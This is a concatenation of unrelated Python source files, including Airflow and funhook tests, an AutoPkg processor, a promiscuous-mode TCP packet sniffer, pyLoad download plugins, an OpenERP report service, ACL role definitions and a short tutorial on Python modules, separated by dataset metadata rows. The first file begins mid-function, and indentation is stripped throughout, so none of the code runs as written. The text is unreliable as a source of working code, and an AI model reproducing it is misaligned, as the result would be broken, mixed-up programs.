def return_num(num):
return num
xcom_arg = return_num(value)
self.operator = xcom_arg.operator
dag = xcom_pass_to_op()
assert dag.params['value'] == self.VALUE
def test_set_task_instance_state():
"""Test that set_task_instance_state updates the TaskInstance state and clear downstream failed"""
start_date = datetime_tz(2020, 1, 1)
with DAG("test_set_task_instance_state", start_date=start_date) as dag:
task_1 = DummyOperator(task_id="task_1")
task_2 = DummyOperator(task_id="task_2")
task_3 = DummyOperator(task_id="task_3")
task_4 = DummyOperator(task_id="task_4")
task_5 = DummyOperator(task_id="task_5")
task_1 >> [task_2, task_3, task_4, task_5]
dagrun = dag.create_dagrun(
start_date=start_date, execution_date=start_date, state=State.FAILED, run_type=DagRunType.SCHEDULED
)
def get_task_instance(session, task):
return (
session.query(TI)
.filter(
TI.dag_id == dag.dag_id,
TI.task_id == task.task_id,
TI.execution_date == start_date,
)
.one()
)
with create_session() as session:
get_task_instance(session, task_1).state = State.FAILED
get_task_instance(session, task_2).state = State.SUCCESS
get_task_instance(session, task_3).state = State.UPSTREAM_FAILED
get_task_instance(session, task_4).state = State.FAILED
get_task_instance(session, task_5).state = State.SKIPPED
session.commit()
altered = dag.set_task_instance_state(
task_id=task_1.task_id, execution_date=start_date, state=State.SUCCESS
)
with create_session() as session:
# After _mark_task_instance_state, task_1 is marked as SUCCESS
assert get_task_instance(session, task_1).state == State.SUCCESS
# task_2 remains as SUCCESS
assert get_task_instance(session, task_2).state == State.SUCCESS
# task_3 and task_4 are cleared because they were in FAILED/UPSTREAM_FAILED state
assert get_task_instance(session, task_3).state == State.NONE
assert get_task_instance(session, task_4).state == State.NONE
# task_5 remains as SKIPPED
assert get_task_instance(session, task_5).state == State.SKIPPED
dagrun.refresh_from_db(session=session)
# dagrun should be set to QUEUED
assert dagrun.get_state() == State.QUEUED
assert {t.key for t in altered} == {('test_set_task_instance_state', 'task_1', start_date, 1)}
| apache-2.0 | 1,359,036,358,921,159,700 | 35.737729 | 110 | 0.582928 | false |
mission-liao/pyfunhook | funhook/test/builtin/cls/inherit.py | 1 | 2697 | '''
Created on Jul 26, 2013
@author: Mission Liao
'''
import unittest
import funhook
from funhook.builtin.cls import adapt_hook_from
class TestClsInherit(unittest.TestCase):
"""
Test cases for built-in hooks for
class inheritance
"""
def test_basic(self):
"""
Test Basic Usage for inheritance
"""
class h_test(funhook.Hook):
def __init__(self):
super(h_test, self).__init__()
self.accept_kwargs = False
self.accept_ret = False
def before(self, bnd, n):
return (n+1, )
class cls_p(object):
@funhook.attach_([h_test()])
def func(self, n):
return n + 1
# seek function to wrap with class object
@funhook.setup_([adapt_hook_from(cls_p)])
class cls_chd(cls_p):
def func(self, n):
return n + 100
sc = cls_chd()
self.assertEqual(sc.func(1), 102)
class cls_p1(cls_p):
def func_not_this_one(self):
pass
class cls_p2(cls_p):
def func_not_found(self):
pass
# seek function to wrap with mro
@funhook.setup_([adapt_hook_from()])
class cls_chd_1(cls_p1, cls_p2):
def func(self, n):
return n + 1000
sc = cls_chd_1()
self.assertEqual(sc.func(1), 1002)
self.assertEqual(issubclass(sc.func.__class__, funhook.base._wrapped_fn), True)
self.assertEqual(issubclass(sc.func_not_this_one.__class__, funhook.base._wrapped_fn), False)
self.assertEqual(issubclass(sc.func_not_found.__class__, funhook.base._wrapped_fn), False)
def test_with_hook_init_param(self):
"""
test cases for hooks with init-parameters
"""
class h_dup(funhook.Hook):
def __init__(self, n):
super(h_dup, self).__init__(n)
self.accept_kwargs = False
self.accept_pos_args = True
self.accept_ret = False
self._n = n
def before(self, bnd, n):
return (n+self._n, )
class cls_pp(object):
@funhook.attach_([h_dup(501)])
def func(self, n):
return n+1
class cls_p1(cls_pp):
pass
class cls_p2(cls_pp):
pass
@funhook.setup_([adapt_hook_from()])
class cls_chd(cls_p1, cls_p2):
def func(self, n):
return n-1
self.assertEqual(cls_pp().func(1), 503)
self.assertEqual(cls_chd().func(1), 501) | mit | -7,213,586,287,989,150,000 | 25.45098 | 101 | 0.502039 | false |
rtrouton/Recipes-for-AutoPkg | Shared_Processors/SubDirectoryList.py | 1 | 3324 | #!/usr/bin/python
#
# Copyright 2013 Jesse Peterson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""See docstring for SubDirectoryList class"""
import os
from autopkglib import Processor, ProcessorError
__all__ = ["SubDirectoryList"]
class SubDirectoryList(Processor):
  '''Lists all files and directories found beneath a given root path,
  for use in other Processors.
'''
input_variables = {
'root_path': {
'description': 'Path to start looking for files.',
'required': True,
},
'suffix_string': {
'description': ("String to append to each found item name in dir."
"Defaults to ','"),
'default': ',',
'required': False,
}
}
output_variables = {
'found_filenames': {
'description': ('String containing a list of all files found '
'relative to root_path, separated by '
'suffix_string.')
},
'found_directories': {
      'description': ('String containing a list of all directories '
'found relative to root_path, separated by '
'suffix_string.')
},
'relative_root': {
'description': ('Relative root path')
}
}
description = __doc__
def main(self):
sip_dirs = [
'usr',
'usr/local',
'private',
'private/etc',
'Library'
]
format_string = '%s' % self.env['suffix_string']
# search_string = ' \'{0}\''
search_string = '{0}'
dir_list = list()
file_list = list()
if not os.path.isdir(self.env['root_path']):
raise ProcessorError("Can't find root path!")
for dirName, subdirList, fileList in os.walk(self.env['root_path']):
relative_path = os.path.relpath(dirName, self.env['root_path'])
# We need to remove the SIP folders so Chef doesn't try to create them
if not relative_path == '.' and not (relative_path in sip_dirs):
dir_list.append(relative_path)
# search_string.format(format_string.join(dirName)).strip()
for fname in fileList:
if '.DS_Store' in fname:
continue
# print('\t%s' % fname)
relpath = os.path.relpath(os.path.join(fname, dirName),
self.env['root_path'])
self.output("Relative path: %s" % relpath)
if relpath == ".":
# we want to avoid prepending './' to files at root dir
relpath = ''
# print "Real relative path: %s" % relpath
file_list.append(os.path.join(relpath, fname))
self.env['found_directories'] = search_string.format(
format_string.join(dir_list)).strip()
self.env['found_filenames'] = search_string.format(
format_string.join(file_list)).strip()
if __name__ == '__main__':
PROCESSOR = SubDirectoryList()
PROCESSOR.execute_shell()
| bsd-3-clause | -6,133,843,226,604,085,000 | 32.24 | 76 | 0.610409 | false |
ayiis/python | better_tcp_sniffer.py | 1 | 7186 | # -*- coding:utf-8 -*-
import socket
import struct
import pcap
import traceback
from aytool.common.print_table import PrettyTable
"""
┌──────────────────────────────────┬──────────────────────────────────┬──────────┐
│ Destination Mac │ Source Mac │Ether type│
└──────────────────────────────────┴──────────────────────────────────┴──────────┘
┌──────┬──────┬──────────┬─────────────────────┐ ┌────────────────────────┬──────────────────┐
│ Ver │ IHL │ TOS │ Total length │ │ Source Port │ Destination Port │
├──────┴──────┴──────────┼──────┬──────────────┤ ├────────────────────────┴──────────────────┤
│ Identification │ Flags│FragmentOffset│ │ Sequence Number │
├─────────────┬──────────┼──────┴──────────────┤ ├───────────────────────────────────────────┤
│ TTL │ Protocol │ Header Checksum │ │ Acknowledgement Number │
├─────────────┴──────────┴─────────────────────┤ ├──────┬────────┬────────┬──────────────────┤
│ Source IP │ │ HL │Reserved│ UAPRSF │ Window Size │
├──────────────────────────────────────────────┤ ├──────┴────────┴────────┼──────────────────┤
│ Destination IP │ │ Checksum │ Urgent Pointer │
├──────────────────────────────────────────────┤ ├────────────────────────┴──────────────────┤
│ Options │ │ Options │
└──────────────────────────────────────────────┘ └───────────────────────────────────────────┘
┌─────────┬───────────────────────────────────────────────────────────────────────────────────┐
│ Data Len│ TCP Data│
└─────────┴───────────────────────────────────────────────────────────────────────────────────┘
"""
_eth_addr = lambda a: "%.2x:%.2x:%.2x:%.2x:%.2x:%.2x" % ((a[0]), (a[1]), (a[2]), (a[3]), (a[4]), (a[5]))
def better_print(packet):
eth_hlen = 14
    # IP header length is normally 20 bytes plus options (the IHL field is in 32-bit words)
ip_hlen = packet[eth_hlen] << 2 & 0b111100
ip_hdata_raw = packet[eth_hlen: ip_hlen + eth_hlen]
ip_hdata = struct.unpack("!BBHHHBBH4s4s", ip_hdata_raw[:20])
    ip_ver = ip_hdata[0] >> 4  # IP version is the high nibble of the first header byte
# ip_hlen = ip_hdata[0] << 2 & 0b111100
ip_dlen = ip_hdata[2]
    # TCP header length is normally 20 bytes plus options (the data offset is in 32-bit words)
tcp_hlen = packet[eth_hlen + ip_hlen + 2 + 2 + 4 + 4] >> 4 << 2
tcp_hdata_raw = packet[eth_hlen + ip_hlen: eth_hlen + ip_hlen + tcp_hlen]
tcp_hdata = struct.unpack("!HHLLBBHHH", tcp_hdata_raw[:20])
tcp_dlen = ip_dlen - ip_hlen - tcp_hlen
tcp_data = packet[eth_hlen + ip_hlen + tcp_hlen: eth_hlen + ip_dlen]
# ETH
pt = PrettyTable()
pt.add_line((32, 32, 8), [_eth_addr(packet[6:12]), _eth_addr(packet[0:6]), "0x" + packet[12:14].hex()])
# if not(tcp_hdata[0] == 10002 or tcp_hdata[1] == 10002):
# return None
    # right-align the output by left-padding each line
print("\n".join(["%s%s" % (x, y) for x, y in zip([" "] * 3, pt.get_table())]))
# IP
pt1 = PrettyTable()
pt1.add_line((4, 4, 8, 16), [ip_ver, ip_hlen, packet[15:16].hex(), ip_dlen])
pt1.add_line((16, 4, 12), ["0x" + packet[18:20].hex(), format(packet[20] >> 5, "03b"), (packet[20] & 0b0001111) << 4 + packet[21]])
pt1.add_line((8, 8, 16), [ip_hdata[5], ip_hdata[6], hex(ip_hdata[7])])
pt1.add_line((32, ), [socket.inet_ntoa(ip_hdata[8])])
pt1.add_line((32, ), [socket.inet_ntoa(ip_hdata[9])])
pt1.add_line((32, ), [("0x" + ip_hdata_raw[20:].hex()) if ip_hlen > 20 else ""])
    # The two expressions below were no-ops in the original (their results are
    # unused); they reference the source/destination IP byte ranges of the packet.
    # packet[14:][12:16]
    # ip_hdata_raw[16:20]
# TCP
pt2 = PrettyTable()
pt2.add_line((16, 16), [tcp_hdata[0], tcp_hdata[1]])
pt2.add_line((32, ), [tcp_hdata[2]])
pt2.add_line((32, ), [tcp_hdata[3]])
pt2.add_line((4, 6, 6, 16), [tcp_hlen, format(tcp_hdata_raw[2 + 2 + 4 + 4] & 0b1111, "04b") + format(tcp_hdata_raw[2 + 2 + 4 + 4 + 1], "08b")[:2], format(tcp_hdata_raw[2 + 2 + 4 + 4 + 1], "08b")[2:], tcp_hdata[6]])
pt2.add_line((16, 16), [hex(tcp_hdata[7]), tcp_hdata[8]])
pt2.add_line((32, ), [("0x" + tcp_hdata_raw[20:].hex()) if tcp_hlen > 20 else ""])
    # print the IP and TCP tables side by side
print("\n".join(["%s %s" % (x, y) for x, y in zip(pt1.get_table(), pt2.get_table())]))
# DATA
pt3 = PrettyTable()
pt3.add_line((7, 81), [tcp_dlen, tcp_data if tcp_dlen > 0 else ""])
pt3.print_table()
def main():
sniffer = pcap.pcap(name=None, promisc=True, immediate=True, timeout_ms=50)
while True:
try:
ts, packet = next(sniffer, (None, None))
if packet[12:14] == b"\x08\x00" and packet[23:24] == b"\x06": # IP & TCP
better_print(packet)
except Exception:
print(traceback.format_exc())
# #
# TEST #
# #
# Python 3.7 #
# Mac #
if __name__ == "__main__":
main()
| mit | -6,738,308,824,205,303,000 | 42.756522 | 218 | 0.382949 | false |
mariusbaumann/pyload | module/plugins/hoster/FastixRu.py | 1 | 1986 | # -*- coding: utf-8 -*-
import re
from random import randrange
from urllib import unquote
from module.common.json_layer import json_loads
from module.plugins.internal.MultiHoster import MultiHoster, create_getInfo
class FastixRu(MultiHoster):
__name__ = "FastixRu"
__type__ = "hoster"
__version__ = "0.08"
__pattern__ = r'http://(?:www\.)?fastix\.(ru|it)/file/\w{24}'
__description__ = """Fastix hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("Massimo Rosamilia", "[email protected]")]
def getFilename(self, url):
try:
name = unquote(url.rsplit("/", 1)[1])
except IndexError:
name = "Unknown_Filename..."
if name.endswith("..."): # incomplete filename, append random stuff
name += "%s.tmp" % randrange(100, 999)
return name
def setup(self):
self.chunkLimit = 3
def handlePremium(self):
api_key = self.account.getAccountData(self.user)
api_key = api_key['api']
page = self.load("http://fastix.ru/api_v2/",
get={'apikey': api_key, 'sub': "getdirectlink", 'link': self.pyfile.url})
data = json_loads(page)
self.logDebug("Json data", data)
if "error\":true" in page:
self.offline()
else:
self.link = data['downloadlink']
if self.link != self.pyfile.url:
self.logDebug("New URL: %s" % self.link)
if self.pyfile.name.startswith("http") or self.pyfile.name.startswith("Unknown"):
            #only use when the name wasn't already set
self.pyfile.name = self.getFilename(self.link)
def checkFile(self):
super(FastixRu, self).checkFile()
        if self.checkDownload({"error": "<title>An error occurred while processing your request</title>"}) == "error":
self.retry(wait_time=60, reason=_("An error occurred while generating link"))
getInfo = create_getInfo(FastixRu)
| gpl-3.0 | 5,678,757,568,383,446,000 | 28.205882 | 118 | 0.58711 | false |
mlperf/training_results_v0.7 | Fujitsu/benchmarks/resnet/implementations/implementation_open/mxnet/3rdparty/tvm/vta/apps/tsim_example/python/tsim.py | 1 | 1886 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
import ctypes
import os.path as osp
from sys import platform
def get_ext():
return ".dylib" if platform == "darwin" else ".so"
def load_dll(dll):
try:
return [ctypes.CDLL(dll, ctypes.RTLD_GLOBAL)]
except OSError:
return []
def load_sw():
cur_path = osp.dirname(osp.abspath(osp.expanduser(__file__)))
sw_libname = "libsw" + get_ext()
sw_lib = osp.join(cur_path, "..", "build", sw_libname)
load_dll(sw_lib)
def init(hw_backend):
"""Init hardware and software shared library for accelerator
Parameters
------------
hw_backend : str
Hardware backend can be verilog or chisel
"""
cur_path = osp.dirname(osp.abspath(osp.expanduser(__file__)))
hw_libname = "libhw" + get_ext()
if hw_backend in ("verilog", "chisel"):
hw_lib = osp.join(cur_path, "..", "hardware", hw_backend, "build", hw_libname)
m = tvm.module.load(hw_lib, "vta-tsim")
load_sw()
f = tvm.get_global_func("tvm.vta.tsim.init")
f(m)
def load_module():
load_sw()
return tvm.get_global_func("tvm.vta.driver")
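if __name__ == "__main__":
    # Minimal smoke-test sketch (an added example, not part of the original
    # helper): initialise one backend and look up the packed driver function.
    # The "chisel" backend choice is an assumption; invoking the driver itself
    # needs DRAM buffers prepared by the host program, so only the lookup is shown.
    init("chisel")
    print(load_module())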
| apache-2.0 | -4,434,247,329,592,706,000 | 31.517241 | 86 | 0.677094 | false |
youknowone/instantauth | python/instantauthtests/test_coder.py | 1 | 1096 |
import json as json_mod
import pytest
from instantauth.coders import ConstantCoder, PlainCoder
from instantauth.coders.urlquery import URLQueryCoder, SimpleURLQueryCoder
from instantauth.coders.json import JsonCoder
constant = ConstantCoder('encode', 'decode')
plain = PlainCoder()
surlquery = SimpleURLQueryCoder()
json = JsonCoder()
@pytest.mark.parametrize(('coder', 'testcase'), [
(constant, [('decode', 'encode')]),
(plain, [('foo', 'foo')]),
(surlquery, [({'f1': 'v1', 'f2': 'v2'}, 'f1=v1&f2=v2')]),
(json, [({'f1': 'v1', 'i': None}, json_mod.dumps({'f1': 'v1', 'i': None}, separators=(',',':')))]),
])
def test_coder(coder, testcase, secret='SECRET'):
"""Round-trip test"""
for case in testcase:
input = case[0]
if len(case) == 1:
expected = None
elif len(case) == 2:
expected = case[1]
else:
raise Exception
encoded = coder.encode(input)
if expected is not None:
assert expected == encoded
decoded = coder.decode(encoded)
assert input == decoded
| bsd-2-clause | -3,076,262,864,103,504,000 | 29.444444 | 103 | 0.601277 | false |
nerdvegas/rez | src/rez/data/tests/release/build.py | 1 | 1566 | from __future__ import print_function
import shutil
import os.path
import os
import sys
def build(source_path, build_path, install_path, targets):
def _copy(src, dest):
print("copying %s to %s..." % (src, dest))
if os.path.exists(dest):
shutil.rmtree(dest)
shutil.copytree(src, dest)
# build
src = os.path.join(source_path, "data")
dest = os.path.join(build_path, "data")
_copy(src, dest)
if "install" not in (targets or []):
return
# install
src = os.path.join(build_path, "data")
dest = os.path.join(install_path, "data")
_copy(src, dest)
if __name__ == '__main__':
build(
source_path=os.environ['REZ_BUILD_SOURCE_PATH'],
build_path=os.environ['REZ_BUILD_PATH'],
install_path=os.environ['REZ_BUILD_INSTALL_PATH'],
targets=sys.argv[1:]
)
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
| lgpl-3.0 | -7,258,360,811,447,583,000 | 28.54717 | 79 | 0.667944 | false |
zbqf109/goodo | openerp/service/report.py | 1 | 5140 | # -*- coding: utf-8 -*-
import base64
import logging
import sys
import threading
import openerp
import openerp.report
from openerp import tools
from openerp.exceptions import UserError
import security
_logger = logging.getLogger(__name__)
# TODO: set a maximum report number per user to avoid DOS attacks
#
# Report state:
# False -> True
self_reports = {}
self_id = 0
self_id_protect = threading.Semaphore()
def dispatch(method, params):
(db, uid, passwd ) = params[0:3]
threading.current_thread().uid = uid
params = params[3:]
if method not in ['report', 'report_get', 'render_report']:
raise KeyError("Method not supported %s" % method)
security.check(db,uid,passwd)
openerp.modules.registry.RegistryManager.check_registry_signaling(db)
fn = globals()['exp_' + method]
res = fn(db, uid, *params)
openerp.modules.registry.RegistryManager.signal_caches_change(db)
return res
def exp_render_report(db, uid, object, ids, datas=None, context=None):
if not datas:
datas={}
if not context:
context={}
self_id_protect.acquire()
global self_id
self_id += 1
id = self_id
self_id_protect.release()
self_reports[id] = {'uid': uid, 'result': False, 'state': False, 'exception': None}
cr = openerp.registry(db).cursor()
try:
result, format = openerp.report.render_report(cr, uid, ids, object, datas, context)
if not result:
tb = sys.exc_info()
self_reports[id]['exception'] = openerp.exceptions.DeferredException('RML is not available at specified location or not enough data to print!', tb)
self_reports[id]['result'] = result
self_reports[id]['format'] = format
self_reports[id]['state'] = True
except Exception, exception:
_logger.exception('Exception: %s\n', exception)
if hasattr(exception, 'name') and hasattr(exception, 'value'):
self_reports[id]['exception'] = openerp.exceptions.DeferredException(tools.ustr(exception.name), tools.ustr(exception.value))
else:
tb = sys.exc_info()
self_reports[id]['exception'] = openerp.exceptions.DeferredException(tools.exception_to_unicode(exception), tb)
self_reports[id]['state'] = True
cr.connection.commit()
cr.close()
return _check_report(id)
def exp_report(db, uid, object, ids, datas=None, context=None):
if not datas:
datas={}
if not context:
context={}
self_id_protect.acquire()
global self_id
self_id += 1
id = self_id
self_id_protect.release()
self_reports[id] = {'uid': uid, 'result': False, 'state': False, 'exception': None}
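    # Rendering happens in a background thread below; callers poll
    # exp_report_get() with the returned id until 'state' flips to True.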
def go(id, uid, ids, datas, context):
with openerp.api.Environment.manage():
cr = openerp.registry(db).cursor()
try:
result, format = openerp.report.render_report(cr, uid, ids, object, datas, context)
if not result:
tb = sys.exc_info()
self_reports[id]['exception'] = openerp.exceptions.DeferredException('RML is not available at specified location or not enough data to print!', tb)
self_reports[id]['result'] = result
self_reports[id]['format'] = format
self_reports[id]['state'] = True
except Exception, exception:
_logger.exception('Exception: %s\n', exception)
if hasattr(exception, 'name') and hasattr(exception, 'value'):
self_reports[id]['exception'] = openerp.exceptions.DeferredException(tools.ustr(exception.name), tools.ustr(exception.value))
else:
tb = sys.exc_info()
self_reports[id]['exception'] = openerp.exceptions.DeferredException(tools.exception_to_unicode(exception), tb)
self_reports[id]['state'] = True
cr.connection.commit()
cr.close()
return True
threading.Thread(target=go, args=(id, uid, ids, datas, context)).start()
return id
def _check_report(report_id):
result = self_reports[report_id]
exc = result['exception']
if exc:
raise UserError('%s: %s' % (exc.message, exc.traceback))
res = {'state': result['state']}
if res['state']:
if tools.config['reportgz']:
import zlib
res2 = zlib.compress(result['result'])
res['code'] = 'zlib'
else:
#CHECKME: why is this needed???
if isinstance(result['result'], unicode):
res2 = result['result'].encode('latin1', 'replace')
else:
res2 = result['result']
if res2:
res['result'] = base64.encodestring(res2)
res['format'] = result['format']
del self_reports[report_id]
return res
def exp_report_get(db, uid, report_id):
if report_id in self_reports:
if self_reports[report_id]['uid'] == uid:
return _check_report(report_id)
else:
raise Exception, 'AccessDenied'
else:
raise Exception, 'ReportNotFound'
| gpl-3.0 | 5,155,048,508,241,609,000 | 34.205479 | 167 | 0.603307 | false |
energyPATHWAYS/energyPATHWAYS | model_building_tools/create_map_keys_from_drivers/map_key_from_driver.py | 1 | 2834 | # -*- coding: utf-8 -*-
"""
Created on Thu Jul 07 19:20:05 2016
@author: ryandrewjones
"""
import sys
import signal
import click
import os
import cPickle as pickle
import energyPATHWAYS.config as cfg
import energyPATHWAYS.util as util
from energyPATHWAYS.pathways_model import PathwaysModel
import energyPATHWAYS.shape as shape
from energyPATHWAYS.outputs import Output
import csv
import time
import datetime
import logging
import cProfile
import traceback
import pandas as pd
# set up a dummy model
path = os.getcwd()
config = 'config.INI'
scenario_id = 1
cfg.initialize_config(path, config, _log_name='log.log')
cfg.primary_geography = 'intersection_id'
model = PathwaysModel(scenario_id, api_run=False)
# model.run(scenario_id, solve_demand=False, solve_supply=False, save_models=False, append_results=False)
demand = model.demand
demand.add_drivers()
existing_geo_map_key_ids, existing_geo_map_key_names = zip(*util.sql_read_table('GeographyMapKeys'))
next_map_key_id = max(existing_geo_map_key_ids)+1
next_geo_map_id = max(util.sql_read_table('GeographyMap', 'id'))+1
###############################################
# user inputs
driver_ids_to_make_map_keys = [
38,
39,
40,
41,
42,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
58,
59,
60,
61]
basis_year_for_map_key = int(cfg.cfgfile.get('case', 'current_year'))
###############################################
# make our new map keys
GeographyMapKeys = [['id', 'name']]
GeographyMap_columns = ['intersection_id', 'geography_map_key_id', 'value', 'id']
GeographyMap = []
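# For each driver: remap it to the detailed geography, slice out the basis year,
# collapse any extra index levels, then emit one new map key plus its
# per-intersection values with sequential ids.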
for driver_id in driver_ids_to_make_map_keys:
driver = demand.drivers[driver_id]
demand.remap_driver(driver) # remaps to our new super detailed geography
values = util.df_slice(driver.values, basis_year_for_map_key, 'year')
if values.index.nlevels>1:
levels_to_remove = [n for n in values.index.names if n!='intersection_id']
values = util.remove_df_levels(values, levels_to_remove)
new_key_name = driver.name
if new_key_name in existing_geo_map_key_names:
raise ValueError('driver name {} is already in the existing map keys, please rename driver id {}'.format(driver.name, driver.id))
GeographyMapKeys.append([next_map_key_id, new_key_name])
values = values.reset_index()
values['id'] = range(next_geo_map_id, next_geo_map_id+len(values))
values['geography_map_key_id'] = next_map_key_id
GeographyMap.append(values)
next_geo_map_id += len(values)
next_map_key_id+=1
output = pd.concat(GeographyMap)[GeographyMap_columns]
output.to_csv(os.path.join(path, 'outputs', 'GeographyMap.csv'), index=False)
with open(os.path.join(path, 'outputs', 'GeographyMapKeys.csv'), 'wb') as outfile:
csvwriter = csv.writer(outfile, delimiter=',')
for row in GeographyMapKeys:
csvwriter.writerow(row)
| mit | 2,169,229,182,338,889,700 | 25.240741 | 137 | 0.690543 | false |
nitely/ochDownloader | plugins/filefactory_com/anonym_download.py | 1 | 1919 | #python libs
import logging
logger = logging.getLogger(__name__)
#Libs
from addons.captcha.recaptcha import PluginRecaptcha
#CONNECTION_RETRY = 3
BASE_URL = "http://www.filefactory.com"
WAITING = 60
class PluginDownload(PluginRecaptcha):
def parse(self):
link = self.link
page = self.get_page(link)
err_list = ('All free download slots are in use.', )
self.validate(err_list, page)
#
m_pattern = 'check:[^\']+\'(?P<check>[^\']+)'
m = self.get_match(m_pattern, page, "Captcha not found")
c_pattern = 'Recaptcha\.create[^"]+"(?P<key>[^"]+)'
extra_fields = [("check", m.group('check')), ]
self.recaptcha_post_link = "%s/file/checkCaptcha.php" % BASE_URL
page = self.recaptcha(c_pattern, page, extra_fields)
#
m_pattern = '"path":"(?P<path>.*?)"'
m = self.get_match(m_pattern, page, "No path found")
link2 = "%s%s" % (BASE_URL, m.group('path').replace("\\", ""))
page = self.get_page(link2)
#"all slots are taken" may appear here.
cn_pattern = 'countdown">(?P<count>[^<]+)'
self.countdown(cn_pattern, page, 320, WAITING)
#
file_id = self.link.split("/file/")[-1].split("/")[0]
s_pattern = '<a href="(?P<link>[^"]+/%s/[^"]+)' % file_id
#s_pattern = 'id="downloadLinkTarget[^<]+<a href="(?P<link>[^"]+)'
self.source = self.click(s_pattern, page, False)
def recaptcha_success(self, pattern, page):
#overriden
if '"status":"ok"' in page:
return True
else:
return False
if __name__ == "__main__":
import re
page = """<p id="downloadLinkTarget" style="display: none;">
"""
pattern = 'id="downloadLinkTarget.*?<a href="(?P<link>.*?)"'
m = re.search(pattern, page, re.S)
if m is not None:
print m.groups()
else:
print 'not found' | lgpl-3.0 | -5,499,612,315,312,826,000 | 32.684211 | 74 | 0.549766 | false |
yaniv14/OpenCommunity | src/acl/default_roles.py | 1 | 3262 | from django.utils.translation import ugettext_lazy as _
class DefaultRoles(object):
VIEWER = 'viewer'
OBSERVER = 'observer'
PARTICIPANT = 'participant'
PROPOSER = 'proposer'
CONTRIBUTOR = 'contributor'
EDITOR = 'editor'
OPERATOR = 'operator'
DECIDER = 'decider'
MANAGER = 'manager'
choices = (
(VIEWER, _('Viewer')),
(OBSERVER, _('Observer')),
(PARTICIPANT, _('Participant')),
(PROPOSER, _('Proposer')),
(CONTRIBUTOR, _('Contributor')),
(EDITOR, _('Editor')),
(OPERATOR, _('Operator')),
(DECIDER, _('Decider')),
(MANAGER, _('Manager')),
)
permissions = {}
permissions[VIEWER] = [
'access_community',
'access_committee',
'viewclosed_issue',
'viewclosed_proposal',
'view_meeting',
]
permissions[OBSERVER] = permissions[VIEWER] + [
'viewopen_issue',
'viewopen_proposal',
'viewupcoming_community',
'vote',
'proposal_board_vote_self',
'vote_ranking',
]
permissions[PARTICIPANT] = permissions[OBSERVER] + [
'view_proposal_in_discussion',
'viewupcoming_draft',
'view_referendum_results',
'view_update_status',
'view_straw_vote_result',
'view_confidential',
]
permissions[PROPOSER] = permissions[PARTICIPANT] + [
'add_proposal',
]
permissions[CONTRIBUTOR] = permissions[PROPOSER] + [
'add_issue',
]
permissions[EDITOR] = permissions[CONTRIBUTOR] + [
'editopen_issue',
'editopen_proposal',
'edittask_proposal',
]
permissions[OPERATOR] = permissions[CONTRIBUTOR] + [
'add_issuecomment',
'edittask_proposal',
'editupcoming_community',
'editparticipants_community',
'editsummary_community', # ???
'invite_member',
'move_to_referendum',
'proposal_board_vote',
]
permissions[DECIDER] = permissions[OPERATOR] + [
'editopen_issuecomment',
'editagenda_community',
'acceptopen_proposal',
'add_meeting', # == Close Meeting
'edit_referendum',
'chairman_vote',
'show_member_profile',
]
permissions[MANAGER] = permissions[DECIDER] + [
'editopen_issue',
'editclosed_issue',
'editclosed_issuecomment',
'editopen_proposal',
'editclosed_proposal',
'acceptclosed_proposal',
]
class DefaultGroups(object):
MEMBER = "member"
BOARD = "board"
SECRETARY = "secretary"
CHAIRMAN = "chairman"
builtin = {
MEMBER: [DefaultRoles.OBSERVER],
BOARD: [DefaultRoles.PARTICIPANT],
SECRETARY: [DefaultRoles.OPERATOR],
CHAIRMAN: [DefaultRoles.DECIDER, DefaultRoles.EDITOR]
}
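    # Flatten each built-in group's roles into a single frozenset of permission codenames.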
permissions = {
k: frozenset(
[p for role in roles for p in DefaultRoles.permissions[role]])
for k, roles in builtin.items()
}
CHOICES = (
(MEMBER, _("member")),
(BOARD, _("board")),
(SECRETARY, _("secretary")),
(CHAIRMAN, _("chairman")),
)
ALL_PERMISSIONS = frozenset(
[p for perms in DefaultGroups.permissions.values() for p in perms])
| bsd-3-clause | -7,700,405,619,576,067,000 | 24.484375 | 74 | 0.568363 | false |
zmsch27/Python | PythonBase/Python_Module.py | 1 | 2415 | #The following is based on Liao Xuefeng's Python tutorial, chapter on Python modules
#As a program grows, the code in a single file gets longer and longer and becomes harder and harder to maintain.
#To keep code maintainable, we group functions and split them across separate files so that each file holds relatively little code; many programming languages organize code this way.
#In Python, a single .py file is called a module (Module).
#To avoid module name clashes, Python also organizes modules by directory; such a directory is called a package (Package)
#Note that every package directory must contain a file named __init__.py; this file is required, otherwise Python treats the directory as an ordinary directory rather than a package.
#__init__.py can be an empty file, or it can contain Python code
#Using a module//////////////////////////////////
#!/usr/bin/env python3
'a test module'
__author__ = 'zmsch27'
import sys
def test():
args = sys.argv
if len(args)==1:
print('Hello World')
elif len(args)==2:
print('Hello %s!' % args[1])
else:
print('To many arguments!')
if __name__=='__main__':
test()
print('-----------------------------------------')
#Scope------------------------------------------
#Normal function and variable names are public and can be referenced directly, e.g. abc, x123, PI;
#Names of the form __xxx__ are special variables; they can be referenced directly but have special uses, e.g. __author__ and __name__ above are special variables
#Functions or variables of the form _xxx or __xxx are non-public (private) and should not be referenced directly, e.g. _abc, __abc;
